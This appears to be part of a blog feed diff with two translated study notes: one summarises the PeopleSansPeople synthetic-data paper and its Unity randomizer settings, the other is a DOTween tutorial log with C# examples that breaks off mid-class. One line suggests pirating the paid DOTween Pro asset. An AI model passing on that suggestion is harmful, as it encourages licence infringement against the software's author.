    jpg

    Lights

    DirectionalLightSun

    jpg

    PointLight (1-6)

    jpg

    PointLightSceneMoving

    ​ 在 PointLight 的基础上多了一个 CustomLightPositionRotationRandomizerTag 组件。

    数据统计

    conda create -n Untiy python=3.7
    conda activate Unity
    pip install datasetinsights -i https://pypi.tuna.tsinghua.edu.cn/simple
    ]]>
+ Resources

Full Text

    Abstract

• Datasets for face detection and human pose estimation lack diversity, and are further constrained by privacy, legal, safety and ethical concerns.
• The authors release PEOPLESANSPEOPLE, a human-centric synthetic data generator. It contains simulation-ready 3D human assets, a parameterized lighting and camera system, and generates 2D and 3D bounding boxes, instance and semantic segmentation, and COCO pose labels.
• Benchmark synthetic-data training was run with a Detectron2 Keypoint R-CNN variant: pre-training the network on synthetic data and fine-tuning on real data works impressively well.
• The model pre-trained on this synthetic data also outperforms the ImageNet-pre-trained model.

    1 Introduction

• The demand for data is huge.
• For human-centric vision tasks, labeled data keeps getting more complex.
• Real datasets raise privacy and ethical issues.
• Data for some actions is hard to collect.
• Manual labeling is error-prone.

The synthetic data generator designed in this paper, PEOPLESANSPEOPLE, is built on Unity and the Perception package. It includes:

• macOS and Linux binaries able to generate large-scale datasets of 1M+ images with JSON annotations;
• 28 3D human models of varying age and ethnicity, with different clothing, hair and skin colors;
• 39 animation clips, with fully randomized humanoid placement, size and rotation to produce diverse arrangements of people;
• fully parameterized lighting (position, color, angle and intensity) and camera settings;
• a set of object primitives used as distractors and occluders;
• a set of natural images used as backgrounds and textures for objects.

Besides the binaries above, a Unity template project is also released to lower the community's barrier to entry by helping people start building their own version of a human-centric data generator. This environment has all of the functionality described for the binaries, except that it ships with:

• 4 sample 3D human models with different clothing colors;
• 8 sample animation clips, with fully randomized humanoid placement, size and rotation to produce diverse arrangements of people;
• a set of natural grocery images from the Unity Perception package, used as backgrounds and textures for objects.
• (Related work) introduces synthetic data generators.

• Domain randomization is a technique that introduces diversity into generated data by randomizing the simulator's parameters. It has been applied to tasks including object detection, robotic manipulation and autonomous vehicle navigation. PEOPLESANSPEOPLE lets researchers use domain-randomized synthetic data for tasks where humans are part of the target categories, expanding the space of simulator capabilities in existing and new domains such as autonomous driving and human pose estimation and tracking.

    3 PEOPLESANSPEOPLE

• PEOPLESANSPEOPLE is a parametric data generator with a 3D scene populated by 3D human assets in various poses and by distractor objects with natural textures. The generator is packaged as a binary that exposes several parameters for modification through a simple JSON configuration file.

• PEOPLESANSPEOPLE generates RGB images and corresponding labels for the human assets: 2D and 3D bounding boxes, semantic and instance segmentation masks, and COCO keypoint labels in JSON. It also emits scene metadata for statistical comparison and analysis.

    3.1 3D Assets

• PEOPLESANSPEOPLE ships a set of 28 scanned 3D human models from RenderPeople. The models are diverse in ethnicity and age, fully retopologized, rigged and skinned, with high-quality textures.

• The assets had to be modified so that the clothing's material elements can be manipulated at runtime. Specifically, the red, green, blue and alpha channels making up some of the mask textures were repainted. A Shader Graph was also created in Unity that allows swapping the human assets' material elements and changing the hue and texture of the clothes. With these changes the human models can be imported into Unity, placed in the scene, animated, and re-textured and re-colored.

jpg

PEOPLESANSPEOPLE 3D Human Models.
a) The 28 scanned 3D human models used in the environment, with default poses and clothing textures.
b) An example of the clothing texture variation enabled by the PEOPLESANSPEOPLE Shader Graph.
• To generate varied poses for the human assets, a set of 39 animations was collected from Mixamo, ranging from simple motions such as idling, walking and running to more complex ones such as planking, breakdancing and fighting. The clips were downloaded as Unity FBX at 24 frames per second with no keyframe reduction, and all animation clips were retargeted to the RenderPeople human assets.

    3.2 Unity Environment

• PEOPLESANSPEOPLE was developed with Unity 2020.3.20f1 and Unity's Perception package 0.9.0-preview.2. The 3D scene contains a background wall, a Perception camera, one directional light (the sun), one moving point light and six fixed point lights.

jpg

PEOPLESANSPEOPLE Design.
(a) Scene setup. The scene has a background wall, a Perception camera, a directional light (the sun), a moving point light and six fixed point lights.
(b), (c) and (d) Example simulations. The small camera preview pane at the bottom right of each figure shows the Perception camera's render preview. The wall background texture, the point lights' color, intensity and position, and the sun direction change every frame. The camera's field of view, focal length, position and orientation can also change. Human assets are spawned in front of the wall at varying scale, pose, clothing texture and rotation about the Y axis, and primitive occluder objects are spawned with varying orientation, scale and texture.
• Scene background and lighting: the background wall texture is picked at random from a set of 1600 natural images taken from the COCO unlabeled 2017 dataset, checked to contain no photos of humans (not even framed pictures of humans hanging on a wall). The texture's hue offset is also varied. The color, intensity and on/off state of the six point lights and the directional light change, and one moving point light additionally changes position and rotation. Together, these eight lights produce varied illumination, shadows and scene appearance.

• Perception camera: the Perception camera extends the rendering process to generate annotation labels. For the benchmark experiments there is a single object class (person), for which 2D bounding boxes and human keypoint labels are generated. The Unity Perception package can also produce semantic and instance segmentation masks and 3D bounding boxes.

• The 2D bounding boxes and human keypoints follow the COCO dataset standard. Keypoint visibility states are $v=0$ not labeled, $v=1$ labeled but not visible, and $v=2$ labeled and visible, as in COCO. However, the $iscrowd=1$ label is not used, because even the most crowded scenes can be labeled with sub-pixel accuracy.


The Perception camera gives users a choice of three labeling schemes:

• Visible objects.

• Visible and occluded objects: here, a person occluded by themselves or by another object is still annotated as visible ($v=2$).

• All objects: here, even objects that fall entirely behind another object are annotated. This is particularly useful for human tracking and activity recognition.


• Objects in the scene: a set of primitive 3D game objects such as cubes, cylinders and spheres serve as background or occluder/distractor objects. They can be spawned at arbitrary positions, scales, orientations, textures and hue offsets, and use the same COCO unlabeled 2017 textures as the background wall.

    3.3 Domain Randomization

• To train models on synthetic data that generalizes to the real domain, the work relies on domain randomization, in which aspects of the simulated environment are randomized to introduce variation into the synthetic data. The Unity Perception package provides a domain randomization framework: on every frame, randomizers act on predefined Unity scene components. You first provide parameter definitions for the components to be randomized, then define how those parameters are distributed. Normal, uniform and binomial distributions are provided, and custom distributions can also be defined. For simplicity, all randomizer values in PEOPLESANSPEOPLE use uniform distributions. (A minimal randomizer sketch follows below.)
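To make the framework concrete, here is a minimal sketch of a custom randomizer and its tag in the style of the Perception randomization API. It is illustrative only: the exact namespaces moved between Perception versions, and the _HueOffset shader property is a made-up example.

using UnityEngine;
using UnityEngine.Perception.Randomization.Parameters;
using UnityEngine.Perception.Randomization.Randomizers;
using UnityEngine.Perception.Randomization.Samplers;

// Attach this tag to any object the randomizer should affect
public class MyHueRandomizerTag : RandomizerTag { }

[System.Serializable]
[AddRandomizerMenu("Custom/My Hue Randomizer")]
public class MyHueRandomizer : Randomizer
{
    // Parameter definition: a uniformly distributed hue offset
    public FloatParameter hueOffset = new FloatParameter { value = new UniformSampler(-180f, 180f) };

    // Runs once at the start of every scenario iteration
    protected override void OnIterationStart()
    {
        // Query every tagged object and apply a fresh sample to it
        foreach (var tag in tagManager.Query<MyHueRandomizerTag>())
        {
            var renderer = tag.GetComponent<Renderer>();
            if (renderer != null)
                renderer.material.SetFloat("_HueOffset", hueOffset.Sample()); // assumed shader property
        }
    }
}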

• In short, they randomize the placement and pose of 3D objects, the textures and colors of the 3D objects in the scene, the lighting configuration and color, the camera parameters, and some post-processing effects. Some kinds of domain randomization, such as lighting, hue offset, and camera rotation/field of view/focal length, mimic the behavior of standard data augmentation, so no data augmentation is used during synthetic-data training.

Domain randomization parameters in the data generator.

    jpg

    3.4 Data Generation

On a MacBook Pro (16-inch, 2019) equipped with:

• a 2.3 GHz 8-core Intel Core i9

• an AMD Radeon Pro 5500M (4 GB)

• Intel UHD Graphics 630 (1536 MB)

• 32 GB 2667 MHz DDR4 memory


• PEOPLESANSPEOPLE generates $10\times10^3$ images with bounding-box and keypoint labels in roughly 3 minutes.

    4 Experiments

• Benchmark synthetic-data training with a Detectron2 Keypoint R-CNN variant: pre-train the network on synthetic data, fine-tune on real data, and compare against training on the COCO dataset.

    4.1 Dataset Statistics

    jpg

Bounding-box occupancy heatmaps. For the benchmark experiments an image size of 640×640 is used. All bounding boxes are overlaid on the image as filled boxes to compute the bounding-box occupancy maps for COCO person and for the synthetic data.

• The diversity is also claimed to be better than that of the GTA-based dataset.

jpg

Compared with COCO, the synthetic dataset contains more instances (bounding boxes) per image.

    4.2 Training

For all models:

• initial learning rate set to 0.02
• initial patience set to 38
• initial epsilon set to 5
• weight decay set to 0.0001
• momentum set to 0.9
• a linear warm-up of 1000 iterations at the start of training (both from scratch and for transfer learning), during which the learning rate is slowly raised to the initial learning rate
• trained with synchronized SGD on 8 NVIDIA Tesla V100 GPUs
  • with a mini-batch size of 2 per GPU
• images normalized with the ImageNet mean pixel values and standard deviation

    real-world dataset

• The COCO train set is split into overlapping subsets
  • of 641, 6411, 32057 and 64115 images, i.e. 1%, 10%, 50% and 100% of the COCO train set, to study few-shot transfer.
  • The smaller sets are subsets of the larger ones.
• The person COCO validation set is used for validation during training.
• Final model performance for all COCO-training-data experiments is reported on the COCO test-dev2017 set.
• For the synthetic dataset, $3$ datasets of $500\times10^3$ images were generated from $3$ random seeds, each split into a $490\times10^3$ training set and a $10\times10^3$ validation set. The synthetic validation set is used to evaluate models during from-scratch training on purely synthetic data.
• After training, the performance of these models is reported on the person COCO validation and test-dev2017 sets.

    benchmark experiments

• First, models are trained from scratch and evaluated on the COCO validation set and the COCO test-dev2017 set.
• Second, the weights of models trained on synthetic data are fine-tuned on limited subsets of COCO (real) data for few-shot transfer.
• For a complete comparison, ImageNet-pre-trained weights are also fine-tuned on the COCO data subsets.
• In few-shot transfer training, all network layers are retrained. The hyperparameters and learning-rate schedules are identical for from-scratch training and few-shot transfer learning.

    5 Results

• Using synthetic data alone still falls somewhat short, but mixing synthetic and real data works very well.

5.1 Discussion

• These encouraging results open further research into hyperparameter search, optimization strategies, training schedules and alternative training strategies to close the sim-to-real gap.

    6 Conclusion and Limitations

• Because of RenderPeople's redistribution and licensing policies, direct access to the 3D human assets is not provided; instead, detailed instructions and examples are given for sourcing and preparing human assets for simulation. Although the pre-built PEOPLESANSPEOPLE binaries cannot do complex structured placement of assets, researchers can update the provided randomizers to allow different strategies.

Code

The repository provides the HDRP version of the PeopleSansPeople Unity environment template. The project includes the custom randomization features and some sample human assets provided by Unity Technologies.

The environment still offers the full functionality of PeopleSansPeople as presented in the paper and as shipped in the Linux and macOS binaries. Since the third-party assets cannot be redistributed, the following sample assets/content are provided instead:

• 4 Unity-branded human assets with different clothing colors but identical appearance.
• 529 Unity grocery textures.
• 8 Unity-owned animation clips.

The purpose of this Unity environment is to enable the community to start building their own versions of human-centric data generators, lowering the barrier to entry and giving them the same functionality that exists in PeopleSansPeople. Users can easily swap the assets and content in this project for their own, as long as the properties match the provided sample assets.

Installed Unity 2020.3.20f1 and ran PeopleSansPeople/peoplesanspeople_unity_env at main · Unity-Technologies/PeopleSansPeople (github.com) directly, but something was wrong somewhere: it loaded painfully slowly and kept freezing. emmmm

Coming back the next day, it behaved normally.

    jpg


HumanScene.unity contains the following objects:

    • Main Camera
    • Wall
    • Simulation Scenario
    • Post Process Volume
    • Sky and Fog Volume
    • Lights
      • DirectionalLightSun
      • PointLight1
      • PointLight2
      • PointLight3
      • PointLight4
      • PointLight5
      • PointLight6
      • PointLightSceneMoving

    Main Camera

    jpg

    Perception Camera

• First capture at 0 seconds and consecutive captures every 0.0166 seconds of simulation time.

• Camera Labelers

  The labeled outputs are:

  • BoundingBox2DLabeler

    2D bounding boxes

  • ObjectCountLabeler

    Object counts

  • RenderedObjectInfoLabeler

    Rendered-object info (what is this for?)

  • SemanticSegmentationLabeler

    Semantic segmentation

  • KeypointLabeler

    Keypoints

  • Animation Pose Configs

    Animation poses

  • InstanceSegmentationLabeler

    Instance segmentation

    CustomAnnotationAndMetricReporter

This script is a custom annotation and metric reporter used when synthesizing datasets with the Perception package in Unity. The main points:

1. The [RequireComponent(typeof(PerceptionCamera))] attribute ensures the script is attached to a game object that carries a PerceptionCamera component (everything related to outputting data annotations goes through the PerceptionCamera).
2. Variables are defined to hold metric definitions, e.g. for light position, rotation, intensity and color, plus metric definitions for the camera's position, rotation, field of view and focal length.
3. In Start(), all metric definitions are registered via DatasetCapture.RegisterMetricDefinition(), each assigned a unique ID.
4. In Update(), the script iterates over the lightSources array and reports each light's position, rotation, intensity and color, using DatasetCapture.ReportMetric() to report the metric values.
5. It also reports the camera's position, rotation, field of view and focal length.
6. The commented-out code is an example of computing a target object's position in the camera's local space and reporting annotation values with GetComponent<PerceptionCamera>().SensorHandle.ReportAnnotationValues().

In short, the script captures and reports metrics and annotations with the Perception package in Unity: light and camera position, rotation, intensity, color and so on, plus bounding-box annotations for target objects (that part is commented out). A minimal sketch of the register-then-report pattern follows.
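For reference, the register-then-report pattern looks roughly like this. This is a minimal sketch assuming the 0.9-era DatasetCapture API; the GUID, the metric name and the LightMetricReporter class are arbitrary examples.

using System;
using UnityEngine;
using UnityEngine.Perception.GroundTruth;

[RequireComponent(typeof(PerceptionCamera))]
public class LightMetricReporter : MonoBehaviour
{
    public Light lightSource; // assumed to be assigned in the Inspector
    MetricDefinition lightPositionMetric;

    void Start()
    {
        // Each metric definition carries a name, a description and a unique GUID
        lightPositionMetric = DatasetCapture.RegisterMetricDefinition(
            "Light position",
            "The world-space position of the light",
            Guid.Parse("1F6BFF46-F884-4CC5-A878-DB987278FE35"));
    }

    void Update()
    {
        // Report this frame's value as a JSON array
        var p = lightSource.transform.position;
        DatasetCapture.ReportMetric(lightPositionMetric,
            $@"[{{ ""x"": {p.x}, ""y"": {p.y}, ""z"": {p.z} }}]");
    }
}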

    CustomCameraRandomizerTag

Tag for camera randomization.

    Wall

    jpg

HueOffsetRandomizerTag

Tag for hue-offset randomization.

TextureRandomizerTag

Tag for texture randomization.

Background Object

Has the following tags:

• CustomBackgroundOccluderScaleRandomizerTag

  Tag for scale randomization

• HueOffsetRandomizerTag

  Tag for hue-offset randomization

• TextureRandomizerTag

  Tag for texture randomization

• RotationRandomizerTag

  Tag for rotation randomization

    Foreground Object

    jpg

Has:

• Shader Graph Texture Randomizer Tag

  Tag for shader-graph texture randomization

• Rotation Randomizer Tag

  Tag for rotation randomization

• Custom Foreground Rotation Randomizer

  Tag for foreground rotation randomization (which, I suspect, overrides the tag above)

• Labeling

  • Holds the person and pose labels
• Animation Randomizer Tag

  Tag for animation randomization

• CustomForegroundScaleRandomizerTag

  Tag for foreground scale randomization

• Keypoint Occlusion Overrides

  Keypoint occlusion overrides

  • Overrides the default occlusion distance values by a scalar. This is necessary for bodies with different body types (i.e. children should be less than one).

    Simulation Scenario

    jpg

    Fixed Length Scenario

    Scenario Properties

The Scenario controls the execution flow of the simulation by applying the randomization parameters. Make sure only one Scenario is ever active in the scene.

    Randomizers

Randomizers execute in the order below. You can change the order by dragging a randomizer up or down by its handle.

• CustomBackgroundObjectPlacementRandomizer

  • Controls background object placement: the X and Y ranges are $[-7.5, 7.5]$, and Depth Value is the Z axis, with range $[-10, 14]$.
  • Background objects are spaced at least $2.5$ apart.
• CustomBackgroundOccluderScaleRandomizer

  • Controls background object scale, in the range $[1, 12]$.
• CustomForegroundObjectPlacementRandomizer

  • Controls foreground object placement: the X and Y ranges are $[-7.5, 7.5]$, and Depth Value is the Z axis, with range $[-9, 6]$.
  • Foreground objects are spaced at least $3$ apart.
• CustomForegroundScaleRandomizer

  • Controls foreground object scale, in the range $[0.5, 3]$.
• TextureRandomizer

  • Picks a random texture from a list.
• HueOffsetRandomizer

  • Hue offset range: $[-180, 180]$
• RotationRandomizer

  • Rotates randomly in $[0, 360]$ on all of X, Y and Z.
• CustomForegroundRotationRandomizer

  • Restricts the random $[0, 360]$ rotation to the Y axis only, presumably so that people's feet point straight down in the generated images.
• SunAngleRandomizer

  • Randomizes the sun's
    • hour
    • day of the year
    • latitude
• AnimationRandomizer

  • Randomizes the pose; the related logic seems to live in AnimationRandomizerTag.cs?
• ShaderGraphTextureRandomizer

  • Picks a random entry from a list for each of the following textures/materials:

    • Albedo Texture

    • Normal Texture

    • Mask Texture

    • Character Material

• CustomCameraRandomizer

  • Camera Field Of View Parameter

    Field-of-view randomization range $[5, 50]$

  • Camera Focal Length Parameter

    Focal-length randomization range $[1, 23]$

  • Multiply Factor: $5$

    • Change Camera Position: $1$

      Positional offset from the initial position, $[-5, 5]$ on each of X, Y and Z ($5 \times 1 = 5$)

    • Change Camera Rotation: $1$

      Rotational offset from the initial rotation, $[-5, 5]$ on each axis ($5 \times 1 = 5$)

• CustomLightRandomizer

  • Light Intensity Parameter
    • Range $[0, 1]$, but CustomLightRandomizerTag multiplies it by a factor, so the final intensity range is $[5000, 20000]$.
  • Light Color Parameter
    • RGB in $[0, 1]$; the alpha channel is fixed at 1.
  • Aux Parameter
    • Auxiliary parameter, purpose unclear; range $[0, 1]$.
• CustomLightPositionRotationRandomizer

  • Multiply Factor: $5$
  • Random Float: $[0, 1]$
  • Change Light Position: $0.73$
    • Positional offset of the light from its initial position: $[-3.65, 3.65]$ ($5 \times 0.73 = 3.65$)
  • Change Light Rotation: $10$
    • Rotational offset from the initial rotation: $[-50, 50]$ ($10 \times 5 = 50$)
• CustomPostProcessVolumeRandomizer

  Post-processing randomizer.

  • Vignette Intensity Parameter

    Vignette intensity: $[0, 0.5]$

  • Fixed Exposure Parameter

    Fixed exposure: $[5, 10]$

  • White Balance Temperature Parameter

    White balance temperature: $[-20, 20]$

  • Film Grain Intensity Parameter

    Film grain intensity: $[0, 1]$

  • Lens Distortion Intensity Parameter

    Lens distortion intensity: $[-0.2, 0.2]$

  • Focus Distance Parameter

    Focus distance (depth of field): $[0.1, 4]$

  • Contrast Parameter

    Contrast: $[-30, 30]$

  • Saturation Parameter

    Saturation: $[-30, 30]$

    Post Process Volume

    jpg

    Sky and Fog Volume

    jpg

    Lights

    DirectionalLightSun

    jpg

    PointLight (1-6)

    jpg

    PointLightSceneMoving

Same as PointLight, but with an additional CustomLightPositionRotationRandomizerTag component.

Data Statistics

conda create -n Unity python=3.7
    conda activate Unity
    pip install datasetinsights -i https://pypi.tuna.tsinghua.edu.cn/simple
    ]]>
@@ -4988,7 +4988,7 @@ /posts/Unity-DOTween/ - Resources

Course

01-Introducing and Importing the DOTween Plugin

Downloading DOTween from the Unity Asset Store (DOTween Pro | Visual Scripting | Unity Asset Store) costs $15... just grab a pirated copy online.

The DOTween official site; to learn it in depth, reading through the official docs is recommended:

The official site declares DOTween the industry leader!

jpg

DOTween can be regarded as the V2 of HOTween.

02-How to Animate a Variable

Attach a test class to something in the scene:

using UnityEngine;
using DG.Tweening;

public class GetStart : MonoBehaviour
{
    public Vector3 myValue = new Vector3(0, 0, 0);

    // Start is called before the first frame update
    void Start()
    {
        // Animate a variable (interpolating the value over time)
        // This call uses C# lambda expressions
        DOTween.To(() => myValue, x => myValue = x, new Vector3(10, 10, 10), 2);
    }
}

DOTween.To() is a static method of the DOTween plugin that creates a tween. It takes four arguments: a getter for the start value, a setter to apply updated values, the end value, and the duration.

1. () => myValue is a lambda expression that reads the current myValue as the tween's start value; this value is recorded when the tween starts.
2. x => myValue = x is also a lambda; it assigns the interpolated value x back to myValue. While the tween runs, DOTween keeps computing new values of x and invoking this lambda to store them in myValue.
3. new Vector3(10, 10, 10) is the end value; in this example, a three-dimensional vector (Vector3) with the value (10, 10, 10).
4. 2 is the duration in seconds; the tween transitions from the start value to the end value over 2 seconds.

In short, this line creates a tween that starts from myValue and gradually transitions it to Vector3(10, 10, 10) over 2 seconds. During the tween myValue updates continuously and ends equal to the target.


Run it! The value changes quickly at first and then slows down.

    jpg

03-Animating a Cube and a UI Panel

In Update(), bind myValue to the Cube's Transform:

    jpg

using UnityEngine;
using DG.Tweening;

public class GetStart : MonoBehaviour
{
    public Vector3 myValue = new Vector3(0, 0, 0);
    public Transform cubeTransform = null;

    // Start is called before the first frame update
    void Start()
    {
        // Animate a variable (interpolating the value over time)
        // This call uses C# lambda expressions
        DOTween.To(() => myValue, x => myValue = x, new Vector3(10, 10, 10), 2);
    }

    // Update is called once per frame
    void Update()
    {
        cubeTransform.position = myValue;
    }
}

Similarly, for the UI panel, bind myValue to taskPanelTransform in Update():

using UnityEngine;
using DG.Tweening;

public class GetStart : MonoBehaviour
{
    public Vector3 myValue = new Vector3(600, 0, 0);
    public Transform taskPanelTransform = null;

    // Start is called before the first frame update
    void Start()
    {
        DOTween.To(() => myValue, x => myValue = x, new Vector3(0, 0, 0), 2);
    }

    // Update is called once per frame
    void Update()
    {
        taskPanelTransform.localPosition = myValue;
    }
}


DOTween.To() is not limited to Vector3; it works for float too:

using UnityEngine;
using DG.Tweening;

public class GetStart : MonoBehaviour
{
    public float myValue2 = 0;

    // Start is called before the first frame update
    void Start()
    {
        // Animate a variable (interpolating the value over time)
        // This call uses C# lambda expressions
        DOTween.To(() => myValue2, x => myValue2 = x, 10, 2);
    }
}

04-Shortcuts for Playing Tweens

Ctrl + N creates a new scene directly; learned something new.


Design a button that moves the panel into view when pressed:

jpg

The following approach does not work for UI:

public void OnClick()
{
    // Tween panelTransform from its current position to (0, 0, 0) over 1 second (this changes the world position)
    // But UI elements use local coordinates, don't they?
    panelTransform.DOMove(new Vector3(0, 0, 0), 1);
}

This version, which changes the local position, works:

public void OnClick()
{
    panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1);
}

05-Playing Tweens Forwards and Backwards

panelTransform.DOPlayBackwards(); plays the tweens bound to panelTransform backwards.

Wrong approach 1:

Since a tween is killed by default once it completes, it cannot be played backwards after it has finished playing.

using UnityEngine;
using DG.Tweening;

public class MyButton : MonoBehaviour
{
    public RectTransform panelTransform;
    private bool isIn = false;

    public void OnClick()
    {
        if (!isIn)
        {
            panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // the tween is killed by default once it completes
            // A Tweener object stores the tween's state; every DO-style call creates a tweener, managed by DOTween
            isIn = true;
        }
        else
        {
            panelTransform.DOPlayBackwards();
            isIn = false;
        }
    }
}

Wrong approach 2:

DOLocalMove() creates a Tweener object; set its auto-kill to false.

But every button press creates a new tween object, which wastes resources.

    jpg

using UnityEngine;
using DG.Tweening;

public class MyButton : MonoBehaviour
{
    public RectTransform panelTransform;
    private bool isIn = false;

    public void OnClick()
    {
        if (!isIn)
        {
            Tweener tweener = panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // the tween is killed by default once it completes
            // A Tweener object stores the tween's state; every DO-style call creates a tweener, managed by DOTween
            tweener.SetAutoKill(false); // disable auto-kill
            isIn = true;
        }
        else
        {
            panelTransform.DOPlayBackwards();
            isIn = false;
        }
    }
}

Wrong approach 3:

tweener.Play() only gets the tween played once.

using UnityEngine;
using DG.Tweening;

public class MyButton : MonoBehaviour
{
    public RectTransform panelTransform;
    private bool isIn = false;
    private Tweener tweener;

    // Start is called before the first frame update
    void Start()
    {
        tweener = panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // the tween is killed by default once it completes
        // A Tweener object stores the tween's state; every DO-style call creates a tweener, managed by DOTween
        tweener.SetAutoKill(false); // disable auto-kill
        tweener.Pause();
    }

    public void OnClick()
    {
        if (!isIn)
        {
            tweener.Play();
            isIn = true;
        }
        else
        {
            panelTransform.DOPlayBackwards();
            isIn = false;
        }
    }
}

Correct approach:

DOPlayForward() plays forwards, the counterpart of DOPlayBackwards().

Calling panelTransform.DOPlayForward() plays all tweens associated with that object.

using UnityEngine;
using DG.Tweening;

public class MyButton : MonoBehaviour
{
    public RectTransform panelTransform;
    private bool isIn = false;

    // Start is called before the first frame update
    void Start()
    {
        Tweener tweener = panelTransform.DOLocalMove(new Vector3(0, 0, 0), 1); // the tween is killed by default once it completes
        // A Tweener object stores the tween's state; every DO-style call creates a tweener, managed by DOTween
        tweener.SetAutoKill(false); // disable auto-kill
        tweener.Pause();
    }

    // Update is called once per frame
    void Update()
    {

    }

    public void OnClick()
    {
        if (!isIn)
        {
            panelTransform.DOPlayForward(); // play forwards
            isIn = true;
        }
        else
        {
            panelTransform.DOPlayBackwards(); // play backwards
            isIn = false;
        }
    }
}

    06-From Tweens

Attach this code to a Cube object:

using UnityEngine;
using DG.Tweening;

public class MyCube : MonoBehaviour
{
    // Start is called before the first frame update
    void Start()
    {
        // By default the tween runs from the current position to the target; with From() it runs from the target position to the current one
        transform.DOMoveX(5, 3).From(true);
    }
}

transform.DOMoveX(5, 3) is a DOTween extension method that creates a movement tween. It takes two arguments: the end value and the duration.

1. 5 is the end value of the movement; here, an X coordinate of 5.
2. 3 is the duration in seconds; the movement takes 3 seconds.

.From(true) turns this into a From tween: instead of moving toward the end value, the object jumps to the from-value immediately and then animates back to its original position. The bool argument (isRelative) makes the from-value relative to the current position, i.e. the object starts at its current X plus 5.

In short, this line makes the object snap to a position offset by 5 along X and then animate back to its starting position over 3 seconds.

07-Tween Settings (Ease Curves and Callbacks)

using UnityEngine;
using DG.Tweening;

public class MyPanel : MonoBehaviour
{
    // Start is called before the first frame update
    void Start()
    {
        Tweener tweener = transform.DOLocalMoveX(0, 2);
        tweener.SetEase(Ease.OutBack);
        tweener.SetLoops(2);
        tweener.OnComplete(OnTweenComplete);
    }

    void OnTweenComplete()
    {
        Debug.Log("Tween finished playing");
    }
}

This code uses DOTween to create a movement tween with some extra settings and a callback.

1. transform.DOLocalMoveX(0, 2) is a DOTween extension method that moves the object along the X axis in local space to a given position. It takes two arguments: the end value and the duration.
  • 0 is the end value; here, a local X coordinate of 0.
  • 2 is the duration in seconds; the movement takes 2 seconds.
2. tweener.SetEase(Ease.OutBack) sets the ease curve. Ease.OutBack overshoots the target and settles back, giving a spring-like finish.
3. tweener.SetLoops(2) sets the loop count: the tween plays twice, i.e. after the forward pass completes it plays once more.
4. tweener.OnComplete(OnTweenComplete) sets the completion callback; the custom OnTweenComplete method is invoked when the tween finishes.

In short: move the object in local space to X = 0 over 2 seconds with an OutBack ease, loop it twice, and call OnTweenComplete when it completes.

08-A Tween's Life Cycle and Its Functions

    A tween’s life

    • When you create a tween it will play automatically (unless you change the global defaultAutoPlay behaviour) until it completes all its loops.

    • When a tween is complete it is automatically killed (unless you change the global defaultAutoKill behaviour), which means you won’t be able to use it anymore.

    • If you want to reuse the same tween, just set its autoKill behaviour to FALSE (either by changing the global autoKill settings for all tweens, or by chaining SetAutoKill(false) to your tween).

    • If your tween’s target becomes NULL while a tween is playing errors might happen. You’ll have to either be careful or activate the safe mode


emmm, for everything else it just tells me to go read the documentation.

09-Dialog Text Animation

    jpg

using UnityEngine;
using UnityEngine.UI;
using DG.Tweening;

public class MyText : MonoBehaviour
{
    private Text text;

    // Start is called before the first frame update
    void Start()
    {
        text = this.GetComponent<Text>();
        text.DOText("Next, we enter the second chapter", 5);
    }
}

This code uses DOTween to create a typewriter-style text animation.

1. text = this.GetComponent<Text>() fetches the Text component on the current game object so it can be referenced via text.
2. text.DOText("Next, we enter the second chapter", 5) is a DOTween extension method that reveals text character by character. It takes two arguments: the target text and the duration.
  • "Next, we enter the second chapter" is the target text to reveal.
  • 5 is the duration in seconds; the full text appears over 5 seconds.

In short: grab the Text component on the current game object and tween its content so that "Next, we enter the second chapter" is typed out character by character over 5 seconds.

10-Screen Shake Effect

Attach a class to the Camera:

jpg

This code uses DOTween to create a position-shake tween.

transform.DOShakePosition(10, new Vector3(1, 1, 0)) is a DOTween extension method that shakes an object's position. Here it takes two arguments: the shake duration and the strength vector.

1. 10 is the duration in seconds; the shake lasts 10 seconds.
2. new Vector3(1, 1, 0) is the strength vector: the position shakes with strength 1 on the X and Y axes while the Z position stays unchanged.

In short: a shake tween that jitters the object on X and Y with strength 1 for 10 seconds, leaving Z fixed. The script itself only appears in the screenshot, so a minimal reconstruction follows below.
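A minimal sketch of what the class in the screenshot presumably looks like (the class name CameraShake is my guess):

using UnityEngine;
using DG.Tweening;

public class CameraShake : MonoBehaviour
{
    // Start is called before the first frame update
    void Start()
    {
        // Shake the position for 10 seconds with strength 1 on X and Y; Z stays fixed
        transform.DOShakePosition(10, new Vector3(1, 1, 0));
    }
}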

11-Color and Fade Tweens

    jpg

using DG.Tweening;
using UnityEngine;
using UnityEngine.UI;

public class TextColorTween : MonoBehaviour
{
    private Text text;

    // Start is called before the first frame update
    void Start()
    {
        text = GetComponent<Text>();
        text.DOColor(Color.red, 2);
        text.DOFade(1, 3);
    }
}

• text.DOColor(Color.red, 2);

  • This uses DOTween to tween the text's color.

    text.DOColor(Color.red, 2) is a DOTween extension method that tweens a text's color. It takes two arguments: the target color and the duration.

    1. Color.red is the target color: the text turns red.
    2. 2 is the duration in seconds; the color transitions to red over 2 seconds.

    In short: grab the Text component on the current game object and tween its color to red over 2 seconds.

• text.DOFade(1, 3);

  • This uses DOTween to tween the text's alpha.

    text.DOFade(1, 3) is a DOTween extension method that fades a text's alpha. It takes two arguments: the target alpha and the duration.

    1. 1 is the target alpha, i.e. the text fades to fully opaque.
    2. 3 is the duration in seconds; the alpha transitions over 3 seconds.

    In short: tween the Text component's alpha, gradually increasing it until the text is fully opaque after 3 seconds.

12-Reading the Official DOTween Documentation

Worth a skim to see what DOTween supports.

13-Creating Tweens Visually with a Component

The DOTween Animation component lets you set up a tween visually in the Inspector.

jpg

Then write another class to control the animation's logic:

using DG.Tweening;
using UnityEngine;

public class Panel : MonoBehaviour
{
    private DOTweenAnimation tweenAnimation;
    private bool isShow = false;

    // Start is called before the first frame update
    void Start()
    {
        tweenAnimation = GetComponent<DOTweenAnimation>();
    }

    public void OnClick()
    {
        if (isShow)
        {
            tweenAnimation.DOPlayBackwards();
            isShow = false;
        }
        else
        {
            tweenAnimation.DOPlayForward();
            isShow = true;
        }
    }
}

14-Using the DOTweenPath Path Editor

Introduces the DOTween Path component, which moves an object along an authored path:

jpg

You can also call its methods; see the sketch after the screenshot:

    jpg
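A minimal sketch of driving the component from code. This assumes DOTween Pro's DOTweenPath exposes the usual component methods such as DORestart(), and that the path itself has been configured in the Inspector; the PathController class is my own example name.

using UnityEngine;
using DG.Tweening;

public class PathController : MonoBehaviour
{
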